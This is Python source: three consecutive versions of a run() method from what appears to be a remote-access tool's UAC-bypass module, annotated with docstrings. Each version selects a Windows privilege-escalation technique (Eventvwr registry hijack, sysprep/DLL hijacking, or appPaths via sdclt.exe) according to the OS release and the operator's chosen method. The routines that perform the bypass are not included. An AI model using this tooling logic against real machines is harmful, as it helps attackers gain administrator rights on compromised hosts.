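def run(self, args):
    """Choose a UAC-bypass routine for the connected client and start it.

    Nothing is launched when the agent runs as a 32-bit process on a
    64-bit OS; two error lines are reported instead. Otherwise the
    Eventvwr routine is used when ``args.method`` is ``"eventvwr"``, or
    when no method was given and the client reports release ``'10'``.
    Every other case falls through to the sysprep routine.

    Args:
        args: Parsed module arguments; only ``args.method`` is read.

    Returns:
        None.
    """
    # Architecture guard. The remote module is consulted only after the
    # local descriptor already says '32bit' (short-circuit kept on purpose).
    if (self.client.desc['proc_arch'] == '32bit'
            and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture()):
        self.error("You are using a x86 process while the os architecture is x64")
        self.error("Migrate to a x64 process before trying to bypass UAC")
        return

    # Identity test against None (was ``== None``), so an argument object
    # with a custom __eq__ cannot be mistaken for "no method given".
    wants_eventvwr = args.method == "eventvwr" or (
        self.client.desc['release'] == '10' and args.method is None
    )

    if wants_eventvwr:
        self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
        bypass_helper = bypassuac(self, rootPupyPath=ROOT)
        bypass_helper.bypassuac_through_EventVwrBypass()
        return

    # NOTE(review): any other method value, including an unrecognised one,
    # ends up here. This version has no local-administrator check before
    # dispatching.
    self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
    bypass_helper = bypassuac(self, rootPupyPath=ROOT)
    bypass_helper.bypassuac_through_PowerSploitBypassUAC()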
def run(self, args):
    """Choose between the two UAC-bypass routines and start one.

    The call stops with an error when the remote
    ``can_get_admin_access()`` check fails. Going by the error text, that
    check is about membership of the local administrators group, so an
    account outside that group never reaches the dispatch below.

    Selection:
      * no method given: Eventvwr when the client reports release ``'10'``,
        DLL hijacking otherwise;
      * ``"eventvwr"``: Eventvwr;
      * any other value: DLL hijacking.

    Args:
        args: Parsed module arguments; only ``args.method`` is read.

    Returns:
        None.
    """
    # Precondition: bail out before any helper is built.
    security = self.client.conn.modules["pupwinutils.security"]
    if not security.can_get_admin_access():
        self.error('Your are not on the local administrator group.')
        return

    bypass_helper = bypassuac(self, rootPupyPath=ROOT)

    # Exactly one technique is selected; the OS release is only consulted
    # when the operator left the method empty.
    if args.method:
        use_registry = args.method == "eventvwr"
    else:
        use_registry = self.client.desc['release'] == '10'

    if use_registry:
        self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
        bypass_helper.bypassuac_through_EventVwrBypass()
        return

    # Invoke-BypassUAC.ps1 picks its technique from the Windows version
    # (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012).
    self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
    bypass_helper.bypassuac_through_PowerSploitBypassUAC()
def run(self, args):
    """Choose one of three UAC-bypass routines and start it.

    The call stops with an error when the remote
    ``can_get_admin_access()`` check fails. Going by the error text, that
    check is about membership of the local administrators group.

    Selection:
      * no method given: ``appPaths`` when the client reports release
        ``'10'``, DLL hijacking otherwise;
      * ``"appPaths"``, ``"eventvwr"`` or ``"dll_hijacking"``: that routine.

    NOTE(review): any other non-empty method value selects nothing, and
    the call returns without reporting success or failure.

    Args:
        args: Parsed module arguments; only ``args.method`` is read.

    Returns:
        None.
    """
    # Precondition: bail out before any helper is built.
    security = self.client.conn.modules["pupwinutils.security"]
    if not security.can_get_admin_access():
        self.error('Your are not on the local administrator group.')
        return

    bypass_helper = bypassuac(self, rootPupyPath=ROOT)

    # Resolve the technique name; the OS release only matters when the
    # operator left the method empty.
    if args.method:
        chosen = args.method
    elif self.client.desc['release'] == '10':
        chosen = "appPaths"
    else:
        chosen = "dll_hijacking"

    if chosen == "appPaths":
        self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
        bypass_helper.bypassuac_through_appPaths()
    elif chosen == "eventvwr":
        self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
        bypass_helper.bypassuac_through_eventVwrBypass()
    elif chosen == "dll_hijacking":
        # Invoke-BypassUAC.ps1 picks its technique from the Windows version
        # (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012).
        self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
        bypass_helper.bypassuac_through_powerSploitBypassUAC()